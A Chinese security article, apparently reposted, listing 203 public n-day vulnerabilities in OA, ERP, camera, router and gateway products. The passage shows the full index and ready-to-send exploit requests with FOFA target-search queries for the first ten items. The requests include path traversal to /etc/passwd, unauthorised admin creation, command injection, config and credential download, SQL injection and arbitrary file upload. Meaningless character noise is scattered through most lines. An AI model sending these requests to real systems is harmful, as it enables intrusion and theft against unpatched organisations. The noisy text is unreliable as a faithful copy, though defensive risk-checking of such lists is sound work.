互联网公开漏洞整理202309-2024065 G3 c+ y$ B9 R: z: a' t
道一安全 2024-06-05 07:41 北京 q D3 N( L. S4 c& D
以下文章来源于网络安全新视界 ,作者网络安全新视界
5 c* @% P& m, v1 e. J, D$ z, E$ A
0 T! f$ y6 C1 {2 [发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
( W" K8 o; z9 u1 g9 z1 U
4 E" P2 W7 I: @1 E K, ]. U漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
* x8 u2 z8 s' D( c6 F6 T# N! F* i4 c5 h( p' g3 u
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
: j, P8 @ A" Q6 z0 t4 [7 ]& \2 r" C& F. A; i- u# j: x
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
7 d3 H( E O( b! n) I2 Q8 f7 K n/ R/ t8 G3 M' E
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。/ e6 \( W' F9 y( ]9 \. Z6 f4 z! u1 d G
' R2 B$ R" J" c+ z$ `
$ s0 J6 c6 N: j f
声明: B" u6 |+ F" y6 E/ F2 j
! [7 N2 Q/ ]/ u% x6 l
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
0 J! y6 n" m$ d* b& }+ c0 ]& q, a2 s8 ~8 e( u
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
7 X6 r V- ?- V4 g: ?1 J8 T! `9 w o. A+ W* H+ z$ d6 M( |
* J: s j1 I' k( ?% s
4 b+ a0 L4 _. |# i0 ^& j' s2 _
目录
% n& z: }+ p$ J, R m$ ~6 k
( _' o u+ k9 H0 |# E01
! L; `9 A" I* t, ?
- a) w: e0 D! f! u/ Q$ z" J1. StarRocks MPP数据库未授权访问
8 n: m, \+ i/ S2. Casdoor系统static任意文件读取. _5 V5 t5 \3 o' @2 L( c( {# U
3. EasyCVR智能边缘网关 userlist 信息泄漏. A# l) g- X' }" P& p
4. EasyCVR视频管理平台存在任意用户添加7 B3 X. e- Q" A7 U2 e! @
5. NUUO NVR 视频存储管理设备远程命令执行
+ e$ _( t6 e# F6. 深信服 NGAF 任意文件读取# I! k2 O' W5 T8 x! |0 D7 T
7. 鸿运主动安全监控云平台任意文件下载3 J4 a2 U6 y7 I) p3 M; @
8. 斐讯 Phicomm 路由器RCE
$ S3 |; _# R. m! O, ~9. 稻壳CMS keyword 未授权SQL注入0 w. H; U* @. K# \; u% s. N
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传" b$ e- |1 f+ }% E6 @# ?
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入6 g7 I( B0 s) j' Q+ v" D( m
12. Jorani < 1.0.2 远程命令执行+ P4 g) ^" K/ V/ u. b2 t
13. 红帆iOffice ioFileDown任意文件读取
) t, h7 }& V' X7 x14. 华夏ERP(jshERP)敏感信息泄露
* q) G0 ^6 f0 V2 d# O15. 华夏ERP getAllList信息泄露& u. @" Y& p5 q, e1 p6 L
16. 红帆HFOffice医微云SQL注入
& E- y* `; a+ k$ l17. 大华 DSS itcBulletin SQL 注入
. d( Q. l; {0 W0 t' `4 f18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
2 s6 h. @4 C+ k- D19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入3 M% t8 `1 n9 [% D
20. 大华ICC智能物联综合管理平台任意文件读取/ o" q) I/ b5 c: v
21. 大华ICC智能物联综合管理平台random远程代码执行! @( T# M9 E, C7 Y: `# y1 K
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
( F% ^- F+ \+ E23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
) O4 U9 r: E8 d24. 用友NC 6.5 accept.jsp任意文件上传7 i' }$ W, r* t; Q* w. G4 U0 O% t+ `
25. 用友NC registerServlet JNDI 远程代码执行+ S; V" ]' p, _+ ?7 n; a, \
26. 用友NC linkVoucher SQL注入
6 f# g/ {/ ?8 j8 @3 J+ I27. 用友 NC showcontent SQL注入
$ @8 F5 h7 I3 v- Y28. 用友NC grouptemplet 任意文件上传
+ l9 G6 P* t* J, z3 k8 G" s7 P+ [3 V29. 用友NC down/bill SQL注入' v' W* D/ A" s9 ~' Y0 Y
30. 用友NC importPml SQL注入3 A8 M+ @5 C) v, t/ V
31. 用友NC runStateServlet SQL注入+ N5 `$ Z; o( a: o, o0 [
32. 用友NC complainbilldetail SQL注入
- u& B5 Z" K4 `) b; w' v33. 用友NC downTax/download SQL注入
6 |0 d6 A7 ~- k34. 用友NC warningDetailInfo接口SQL注入
" [5 u* h( {+ K35. 用友NC-Cloud importhttpscer任意文件上传9 y% e- k3 ^7 \: f; Q" u
36. 用友NC-Cloud soapFormat XXE
" j. ]$ R( L* x p37. 用友NC-Cloud IUpdateService XXE
- S* r/ A3 L# G2 J% X" o1 F$ v) k38. 用友U8 Cloud smartweb2.RPC.d XXE
0 q$ D* G" t; s5 f6 U2 q; {5 g4 K; h, J39. 用友U8 Cloud RegisterServlet SQL注入! u3 R/ X6 z$ P# i; u$ R0 U
40. 用友U8-Cloud XChangeServlet XXE* z8 \9 a: J4 h7 {
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入/ T; h( M! s( v. ~; N0 d
42. 用友GRP-U8 SmartUpload01 文件上传
% `' [7 t% q+ |! y43. 用友GRP-U8 userInfoWeb SQL注入致RCE, m) e1 ]5 h8 Z& o5 C$ D
44. 用友GRP-U8 bx_dj_check.jsp SQL注入1 q, {0 G# Q7 u2 n8 H3 g3 k! w4 g
45. 用友GRP-U8 ufgovbank XXE' |0 {* v( i2 {( K( a
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
0 u5 Z( M' P3 t) c1 ^47. 用友GRP A++Cloud 政府财务云 任意文件读取) r: k6 A |2 K
48. 用友U8 CRM swfupload 任意文件上传3 K1 z; ^8 h) x/ c5 d
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 v4 W9 `- v- M6 V2 I50. QDocs Smart School 6.4.1 filterRecords SQL注入
' E+ c' A$ ^9 d+ G1 F0 K% b1 W51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入) J; Y: d/ Y& T& J2 e4 Y
52. 泛微E-Office json_common.php sql注入
1 g( l$ p! @6 W7 M6 z53. 迪普 DPTech VPN Service 任意文件上传- y; R" H4 l5 Q: ?
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
& X2 G* P, f8 X/ p/ P0 F3 L55. 畅捷通T+ getdecallusers信息泄露
+ g- {# F, e8 T1 W8 R( g) S1 `56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE- F2 g- q6 |: s X' F; N2 W
57. 畅捷通T+ keyEdit.aspx SQL注入7 z4 ]3 T0 J+ y" u
58. 畅捷通T+ KeyInfoList.aspx sql注入
$ o( Q, R+ R: t6 t: B: ]* K# O59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行4 @' H1 l4 O: Z! y
60. 百卓Smart管理平台 importexport.php SQL注入- @' ^7 s" C6 q4 S6 U2 a& O& O
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传# s& ^' @5 L; u1 p( y- g* D {; e
62. IP-guard WebServer 远程命令执行
: C6 P& l1 G! @/ R; Z, b$ _% C( P63. IP-guard WebServer任意文件读取2 ~$ v& C1 M/ a- m8 i. Z% ~
64. 捷诚管理信息系统CWSFinanceCommon SQL注入4 [' `1 q5 E9 }+ Y# f
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过; B; H+ }- _6 }0 k/ i
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
+ s5 G$ r: R1 ]9 W8 T' A67. 万户ezOFFICE wpsservlet任意文件上传
' i7 J. d$ _5 w/ t68. 万户ezOFFICE wf_printnum.jsp SQL注入, n) b \& K' b7 Z
69. 万户 ezOFFICE contract_gd.jsp SQL注入
+ S: D8 l9 T) g& ]* ?0 d70. 万户ezEIP success 命令执行& ~- w$ {/ P, I& s
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
5 ~ l5 J% q" r& V, i. ]- M72. 致远OA getAjaxDataServlet XXE
5 x/ F0 K ~+ z5 {. x1 s0 K4 r73. GeoServer wms远程代码执行
- o, R! }$ A c; R74. 致远M3-server 6_1sp1 反序列化RCE' ^% @/ E, n' Y5 d" z2 g
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE; [2 |; a4 E. i5 I3 e; ^
76. 新开普掌上校园服务管理平台service.action远程命令执行4 Y+ B$ p) Q4 p: {8 M6 [ ~: J
77. F22服装管理软件系统UploadHandler.ashx任意文件上传5 i3 J1 |8 S N6 L
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
3 S* q- C" E" K79. BYTEVALUE 百为流控路由器远程命令执行
9 ]2 k$ v* N- e1 K80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
" F7 j- {* A- H% ]( x+ [81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
5 p N: h# t. b8 I+ S82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行; I0 w4 O! b5 y- G: C0 y
83. JeecgBoot testConnection 远程命令执行
( N+ q0 e: ?8 Y. {84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
3 J1 G1 H3 l$ v6 Q8 T2 f/ R$ ^85. SysAid On-premise< 23.3.36远程代码执行( q- y3 Z2 P* V4 B# C
86. 日本tosei自助洗衣机RCE6 ]/ Y9 `, ]8 n; `- B
87. 安恒明御安全网关aaa_local_web_preview文件上传7 Z8 u8 l$ U6 V4 h
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行( ]4 F- d; a+ Z6 |& @8 m8 O6 M
89. 致远互联FE协作办公平台editflow_manager存在sql注入
1 j" o% H8 Q6 l3 S3 v1 \9 v90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
3 A, f0 c. ~& d91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
! q+ [: h# _7 v6 d( G! s: Z92. 海康威视运行管理中心session命令执行+ G v/ ^9 u7 `" t+ M
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传9 E$ M/ }5 L/ j3 E1 h' \3 n
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传6 b0 ^ \! E% o9 K# w. S/ y
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行* }% w% ]1 C; ~% E0 @0 v/ S8 S
96. Apache OFBiz 18.12.11 groovy 远程代码执行
- h, r0 B) J9 o+ d97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行( R, T6 \* Q/ c8 I
98. SpiderFlow爬虫平台远程命令执行
* v" c0 H! S9 o1 m99. Ncast盈可视高清智能录播系统busiFacade RCE
& w4 y9 u5 h; a& w+ S q, f100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传7 E2 K7 U# `$ s& w
101. ivanti policy secure-22.6命令注入6 [2 M; M# j% V e
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行7 i! k2 A' ?3 `( o
103. Ivanti Pulse Connect Secure VPN XXE' e& u ]; G1 `
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露; F* B- a4 I: s
105. SpringBlade v3.2.0 export-user SQL 注入8 ~6 M+ T4 w6 x( u7 T8 ~% p! c0 N9 S
106. SpringBlade dict-biz/list SQL 注入
9 A: X7 ]1 l2 I" E# v107. SpringBlade tenant/list SQL 注入# V. a7 j- ^$ [9 ]
108. D-Tale 3.9.0 SSRF+ j% L: g% e% {, G% o
109. Jenkins CLI 任意文件读取
/ e# }$ I2 Q2 P9 j& C2 y) Z110. Goanywhere MFT 未授权创建管理员9 V! R5 @1 }; T/ f) w$ a
111. WordPress Plugin HTML5 Video Player SQL注入
* ]' c$ _( ^$ T( c112. WordPress Plugin NotificationX SQL 注入
; r& @7 m! K' I113. WordPress Automatic 插件任意文件下载和SSRF
' p6 _7 {* U1 Q W4 F114. WordPress MasterStudy LMS插件 SQL注入7 W6 r* _. ] M, S2 u0 ^0 H; f
115. WordPress Bricks Builder <= 1.9.6 RCE0 w' B. L1 G* I5 h& i; Q& G$ o: W
116. wordpress js-support-ticket文件上传, M( `. G, }/ g+ W5 P1 K
117. WordPress LayerSlider插件SQL注入& E- u+ s- }3 x$ n4 V; h5 F
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传; G v0 {# ?( o$ T0 i
119. 北京百绰智能S20后台sysmanageajax.php sql注入# u% {- @5 W- `8 ^6 d8 F
120. 北京百绰智能S40管理平台导入web.php任意文件上传! Q: a5 |1 p0 ~0 B/ O q
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
9 O) K3 m" N, S h122. 北京百绰智能s200管理平台/importexport.php sql注入
: t/ }3 ~5 k+ J/ k# A8 [3 ^2 [123. Atlassian Confluence 模板注入代码执行
( x3 E; Y6 A9 ~) Y, {5 T2 ?124. 湖南建研工程质量检测系统任意文件上传5 _5 ?/ E7 Q5 Q# S
125. ConnectWise ScreenConnect身份验证绕过
$ @ F$ D, {7 K" ~126. Aiohttp 路径遍历
7 p1 q' M' P, N% ~8 H3 ?127. 广联达Linkworks DataExchange.ashx XXE0 j# x8 d% s/ A. h, y, H, [1 X1 }
128. Adobe ColdFusion 反序列化
* y0 {: i2 C: B; x6 e0 k6 X129. Adobe ColdFusion 任意文件读取
2 Y9 c [8 _3 y, m) @130. Laykefu客服系统任意文件上传
/ z% e+ D% k' o5 J7 n" O! e5 k) J131. Mini-Tmall <=20231017 SQL注入2 r5 Q: z6 q8 \, l& a6 Q
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 j' l5 o- V# ]# k% t
133. H5 云商城 file.php 文件上传6 C! a+ k( i. F/ _% m! P
134. 网康NS-ASG应用安全网关index.php sql注入, Y3 T# m1 a7 z
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 X; n/ [) {+ C' T. p136. NextChat cors SSRF4 ? W, q. Y. ]) k
137. 福建科立迅通信指挥调度平台down_file.php sql注入; v' X' s' @, \ }) S
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
' c' o7 y/ E' M% U! K139. 福建科立讯通信指挥调度平台editemedia.php sql注入 {. ]; n; d" D1 C5 l! H) K. ~5 p
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
! n3 E1 `( k* ]; s# I. o141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入5 X7 g. _) [) Q9 `( ^1 q g
142. CMSV6车辆监控平台系统中存在弱密码
% W# g6 g9 v D$ x5 R9 S143. Netis WF2780 v2.1.40144 远程命令执行
9 S9 H. `( n- S! X6 {5 ]144. D-Link nas_sharing.cgi 命令注入+ o* ?9 z% @7 b% R
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
9 w7 x! {1 n$ }! ]5 [; j! t2 _146. MajorDoMo thumb.php 未授权远程代码执行8 } }" l! q! u# _* ]
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历' B" ?) c- X0 |) ?/ L
148. CrushFTP 认证绕过模板注入- b' s# T8 S( [9 ]3 h8 e# U8 u
149. AJ-Report开源数据大屏存在远程命令执行
8 ^, r) i4 h" ?6 C/ b& }150. AJ-Report 1.4.0 认证绕过与远程代码执行
* c) b* |7 c, w* d$ }151. AJ-Report 1.4.1 pageList sql注入+ Y* o8 ~* L. ^( ?1 Q5 A
152. Progress Kemp LoadMaster 远程命令执行
( X( {' b3 \4 ?& `3 @153. gradio任意文件读取
" A2 w/ f6 D5 R154. 天维尔消防救援作战调度平台 SQL注入
, |, ]6 H4 _& i+ p- P- a155. 六零导航页 file.php 任意文件上传
; K" [' }. H! D% W4 G156. TBK DVR-4104/DVR-4216 操作系统命令注入
7 c n& Y8 C) T157. 美特CRM upload.jsp 任意文件上传! ?3 n3 B# S; @- ]; C: x& V5 p* s
158. Mura-CMS-processAsyncObject存在SQL注入, C* V( P4 u! y% m2 C
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传/ k, L s) z6 s5 A' s) _
160. Sonatype Nexus Repository 3目录遍历与文件读取5 {$ {! X+ P. m" @
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 k+ @0 o. M. y
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
% O- F7 C' X3 d2 _8 n. {8 U163. 号卡极团分销管理系统 ue_serve.php 任意文件上传( U$ j3 ?5 C+ B2 _. L- C
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ W- M5 H i; T% a* ?, s- m% K8 k
165. OrangeHRM 3.3.3 SQL 注入
& V; {) R/ [, A8 C7 }8 Z166. 中成科信票务管理平台SeatMapHandler SQL注入8 F! X1 ]/ ^5 I/ K% Z X
167. 精益价值管理系统 DownLoad.aspx任意文件读取
: i( {& z% e% {4 [; _; g" A168. 宏景EHR OutputCode 任意文件读取) {9 v L# z* o% z9 V: f
169. 宏景EHR downlawbase SQL注入
/ b( ]% ]7 D% j6 i* w: p$ B170. 宏景EHR DisplayExcelCustomReport 任意文件读取
4 ~ T" e% q. ?* A0 Q& S3 o. {171. 通天星CMSV6车载定位监控平台 SQL注入
" u% V5 ^, {" D! C9 F& F172. DT-高清车牌识别摄像机任意文件读取" w, a' j4 @; P3 U
173. Check Point 安全网关任意文件读取
( K/ f& f3 B8 r+ @174. 金和OA C6 FileDownLoad.aspx 任意文件读取
" V- b! j" I9 I) I. w( o: t175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
% M/ D0 h# l6 F5 _9 O `176. 电信网关配置管理系统 rewrite.php 文件上传5 s) Y% [5 _3 y ^ L) a! K
177. H3C路由器敏感信息泄露
) b3 y9 c! ?' }# b& G: C178. H3C校园网自助服务系统-flexfileupload-任意文件上传
& j; x+ m+ C4 Z$ u5 H% E P8 }: ~# w179. 建文工程管理系统存在任意文件读取8 h- Q" I: Q6 U
180. 帮管客 CRM jiliyu SQL注入
: ? Y$ m) h5 F; G181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
- P' y5 q6 W* i7 N, k182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建2 c5 c% l2 l5 I4 @8 o
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
; x# {" O# N' R) W' S" k184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加! T3 Y2 K- | u! f
185. 瑞友天翼应用虚拟化系统SQL注入
7 |, i% ^' i+ }186. F-logic DataCube3 SQL注入: ?. N# P6 L$ h) g+ N y
187. Mura CMS processAsyncObject SQL注入8 ` b$ O' u2 v, q
188. 叁体-佳会视频会议 attachment 任意文件读取4 A& ]5 X& m9 E" I- ^. M0 x% g
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
- j' s$ \: X# Q! V190. 短视频矩阵营销系统 poihuoqu 任意文件读取; A5 T* [- q4 n4 Y# {3 a
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入: Q) e5 J2 Z( @* l2 d9 K
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
0 G* X7 O- `" Q2 Q193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行0 u$ Y" J7 T8 U2 a
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传4 z5 e1 ^' P0 I' l
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
/ R% A, [3 |/ l' g' d. x196. 河南省风速科技统一认证平台密码重置' v3 _7 z, j; j$ `, {. W/ [& B
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
$ p7 }( M, `$ ?* {198. 阿里云盘 WebDAV 命令注入- _" H" v8 x5 J4 o5 h6 z" ^" v0 s
199. cockpit系统assetsmanager_upload接口 文件上传
& L, @0 k) U( w, n( X. u9 ~200. SeaCMS海洋影视管理系统dmku SQL注入
$ A" P' E3 D: g201. 方正全媒体新闻采编系统 binary SQL注入
! p( v( x+ k- S5 m/ I4 m" y/ Z202. 微擎系统 AccountEdit任意文件上传
4 `# |. f$ F4 Q) E- G* Q203. 红海云EHR PtFjk 文件上传0 y5 q k% F6 c& N% S" v
' Q) i: n6 z5 b! QPOC列表
, j( e9 Y1 w4 @( I- N5 y, D4 x$ ~6 }% `1 ^
02% Z# r9 i% y$ o7 z" k
i# k3 r" Z; b
1. StarRocks MPP数据库未授权访问
6 L5 }* M* R4 S0 @& W% [. pFOFA :title="StarRocks"5 N% }5 g3 t1 e3 n# O( `, ]- G, ~. N
GET /mem_tracker HTTP/1.17 a" P0 l! V7 i$ \* q: O
Host: URL
! e, b6 T. {2 J3 b" l5 N2 U3 ^ }' |0 _% E
6 r. F, S- t5 d, K
2. Casdoor系统static任意文件读取
) r/ ]& b6 ` QFOFA :title="Casdoor") @$ o! k5 h! P0 j
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1$ k4 X3 ^0 J: l) [- ~, m2 w1 N* V
Host: xx.xx.xx.xx:9999* T& W' ?4 w& Q8 d2 o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* G" w* Y2 a! h8 c1 k+ F
Connection: close
. t( G0 X1 `1 z4 E8 z+ m3 K, TAccept: */*
. @; f1 C7 }# N" DAccept-Language: en" j: p. k" D# Z. q9 p3 }* [
Accept-Encoding: gzip
) f7 `5 X! Z4 C+ {4 p
3 r- _1 D4 n8 z: E; _
# i+ Y& I" k. K3. EasyCVR智能边缘网关 userlist 信息泄漏
' s3 D! e4 P* W& ?3 ?- c- [# tFOFA :title="EasyCVR", w/ B+ d' D o9 ?
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1, A/ ~$ a" l+ b
Host: xx.xx.xx.xx
7 P! N6 ^( o/ _$ A- o ?" B% n! S
% q- g! \* j" a Z0 p+ [
3 |2 _& i1 G% K+ K4. EasyCVR视频管理平台存在任意用户添加
" X+ `7 k% A+ D' }FOFA :title="EasyCVR"* h6 P" w! I/ s* u* o/ t1 ], {
0 G* W" l _ V: f7 G' A) _2 l
password更改为自己的密码md5! z; ?# Z8 T! a# T
POST /api/v1/adduser HTTP/1.18 y2 C h8 R' R1 n& A. w
Host: your-ip1 A! M. ^, v- A$ C# ]5 H
Content-Type: application/x-www-form-urlencoded; charset=UTF-80 K) q8 x$ N2 m, R$ q- y: ~$ _, \
8 Z2 o' z8 H$ B7 s
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
5 R8 a' h8 I: |5 t8 G$ K6 o. N; ~7 H2 }9 S+ p) X+ p
+ E1 p( P/ ^# I& c5. NUUO NVR 视频存储管理设备远程命令执行5 @1 c& E' n/ [3 U8 R/ v
FOFA:title="Network Video Recorder Login"& V* Z2 J: C% a, B3 H, D* ?+ B
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.12 O2 k* g+ o8 \: m
Host: xx.xx.xx.xx
& }/ J" {9 L* l- @$ w9 A1 ^8 S- ` d9 t) d7 r& t
3 J7 s Z7 R, C. J4 R6 T6. 深信服 NGAF 任意文件读取( C& G# u% Q+ \1 [) w* e" {- \& k
FOFA:title="SANGFOR | NGAF"8 B4 L/ C. l$ T3 g% K% y5 m
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1( R# T) g1 K+ `. e$ i/ {5 O) [$ G
Host:! K" q( s* q8 m# x# c: _: D& b
. Y, {* E$ `, b5 E2 u4 Z' A- t
0 [$ t' H0 D# a; x. I$ i* \% N0 U7. 鸿运主动安全监控云平台任意文件下载 X7 {% l' w5 X: r& O: U$ V
FOFA:body="./open/webApi.html"& [7 p6 l: M) w7 E+ l% q
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1- S7 `, m# o; @- p4 U
Host:/ t: \3 F( |7 _0 e8 C2 T
" O3 F# V% z* v- Z, O' H
, ~4 R+ `( b. e" ]3 J0 X. b7 g1 {
8. 斐讯 Phicomm 路由器RCE; E5 l+ d1 n& Z) b, p* Q4 }
FOFA:icon_hash="-1344736688"
5 z% A3 H7 E- ?4 P; ]" l* y默认账号admin登录后台后,执行操作
3 H5 A1 v; _; } { p gPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1$ g+ `* ~% _5 b- I2 r
Host: x.x.x.x
+ c2 F2 p- k0 v _; q8 W0 ECookie: sysauth=第一步登录获取的cookie7 \# F0 b/ A2 T5 W: t- z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz: z* `5 c3 U; N" H5 \
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
4 c5 m) Z# k& t1 r+ G- [
( h2 r! Q- `9 K0 {! C# }------WebKitFormBoundaryxbgjoytz
3 F- ~/ b6 p3 z3 ]. W! H% M! O8 GContent-Disposition: form-data; name="wifiRebootEnablestatus"
) {; C5 e: v; N: j! K' G# [0 p+ k" |# c3 P1 Y: m
%s) P- h$ b7 T8 @0 G& x7 P3 K; y' ^
------WebKitFormBoundaryxbgjoytz
) N% l0 b. U8 LContent-Disposition: form-data; name="wifiRebootrange"
& X9 E2 o3 v( W. D4 f0 J3 c8 W8 S" B1 o2 J1 X4 h! M
12:00; id;3 N7 e7 i/ p2 V0 Z. N
------WebKitFormBoundaryxbgjoytz
; {- s/ v; l7 lContent-Disposition: form-data; name="wifiRebootendrange"
1 A0 ]) n9 x) N9 S; f# ^" d1 D) |' ^- V3 `9 J* N6 `" z9 Z" b1 s
%s:
" S# [6 a" Z3 H; `------WebKitFormBoundaryxbgjoytz
0 ?5 _$ U, j0 Z& u) I5 YContent-Disposition: form-data; name="cururl2"' _; ?9 W7 u/ c+ J0 S
2 F" U+ v; L/ I2 A( \
9 Q3 q! v$ ~3 M( Q/ ~4 b% v------WebKitFormBoundaryxbgjoytz--, F: p) j& [( U& c/ _+ P* i
6 y# [) w1 J9 ^7 h4 {6 K0 {0 F0 H8 c. i! ?8 K/ M
9. 稻壳CMS keyword 未授权SQL注入" V- H; R6 a9 S Y0 V
FOFA:app="Doccms"3 u6 V x c+ m X. e
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
# R6 \( u6 [$ |6 k3 Z, BHost: x.x.x.x
" R3 N0 j$ r5 P- E: D
& S, W3 n& c6 ?; E9 C S+ X- O8 m$ X, J D2 B
payload为下列语句的二次Url编码8 C5 \7 |8 I0 l. X
2 U; A6 G; V2 S% L% h% a' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))## ^3 e* C& d# L# G/ G
, |; Y) |7 m2 j2 v$ @10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
& C$ L( Q. ]% d6 P* ?, OFOFA:icon_hash="953405444"
" Y& W9 l9 {' x* J( d) n) e: T; x- Z S! N6 N1 g/ t1 P
文件上传后响应中包含上传文件的路径
' f: k5 X( T+ D, p/ w1 u* }) h% i( aPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
& a' |% u( k: f' S1 V: Q5 OHost: x.x.x.x:xx
: I6 ~* J4 H" B: z4 x" N3 @6 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.361 j7 l& l- Z* w* {! W6 S
Content-Length: 197% A- T* U0 B4 `7 w9 u- _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 Y( Y. p0 S7 _! p1 r8 P
Accept-Encoding: gzip, deflate
4 [) H; b3 H% e# Q( JAccept-Language: zh-CN,zh;q=0.9
% J8 a, O4 v4 M+ L/ o6 y _3 {+ DConnection: close
2 C# A0 P( T2 d5 c9 O8 BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
* ]* M# C" i, i7 P: M2 X* o2 `/ A7 X7 }# @- h8 r
------WebKitFormBoundaryxdgaqmqu" ]" V3 D( k( ~7 P3 U$ k5 C
Content-Disposition: form-data; name="file"filename="icfitnya.txt"( D8 m0 O" l$ x
Content-Type: text/html
' f$ b. o% j9 K' ^3 P. \0 p0 f3 ]1 H, p8 t& I
jmnqjfdsupxgfidopeixbgsxbf$ q6 @% z* P$ o8 X& I6 J+ D# `) C
------WebKitFormBoundaryxdgaqmqu--
) q% o+ ~; G5 y) ?' e" N6 Y
# m. O$ h6 I& r0 h/ K: z' w& h$ n" V+ Q
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入# p, w4 }( n2 M+ c- P# c
